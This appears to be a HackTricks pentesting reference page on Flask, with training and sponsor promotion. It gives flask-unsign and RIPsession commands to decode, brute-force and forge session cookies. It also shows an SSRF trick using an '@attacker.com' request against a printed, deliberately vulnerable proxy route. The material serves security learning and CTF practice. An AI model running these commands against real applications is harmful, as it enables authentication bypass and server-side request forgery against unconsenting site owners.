# Flask {% hint style="success" %} Learn & practice AWS Hacking:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Learn & practice GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

{% endhint %}

Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=flask) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="" %} **Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](https://angelica.gitbook.io/hacktricks/pentesting-web/ssti-server-side-template-injection)**.** ## Cookies Default cookie session name is **`session`**. ### Decoder Online Flask coockies decoder: #### Manual Get the first part of the cookie until the first point and Base64 decode it> ```bash echo "ImhlbGxvIg" | base64 -d ``` The cookie is also signed using a password ### **Flask-Unsign** Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. {% embed url="" %} ```bash pip3 install flask-unsign ``` #### **Decode Cookie** ```bash flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8' ``` #### **Brute Force** ```bash flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '' --no-literal-eval ``` #### **Signing** ```bash flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' ``` #### Signing using legacy (old versions) ```bash flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy ``` ### **RIPsession** Command line tool to brute-force websites using cookies crafted with flask-unsign. {% embed url="" %} ```bash ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt ``` ### SQLi in Flask session cookie with SQLmap [**This example**](https://angelica.gitbook.io/hacktricks/pentesting-web/sql-injection/sqlmap#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret. ## Flask Proxy to SSRF [**In this writeup**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) it's explained how Flask allows a request starting with the charcter "@": ```http GET @/ HTTP/1.1 Host: target.com Connection: close ``` Which in the following scenario: ```python from flask import Flask from requests import get app = Flask('__main__') SITE_NAME = 'https://google.com/' @app.route('/', defaults={'path': ''}) @app.route('/') def proxy(path): return get(f'{SITE_NAME}{path}').content app.run(host='0.0.0.0', port=8080) ``` Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**.

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Learn & practice GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

{% endhint %}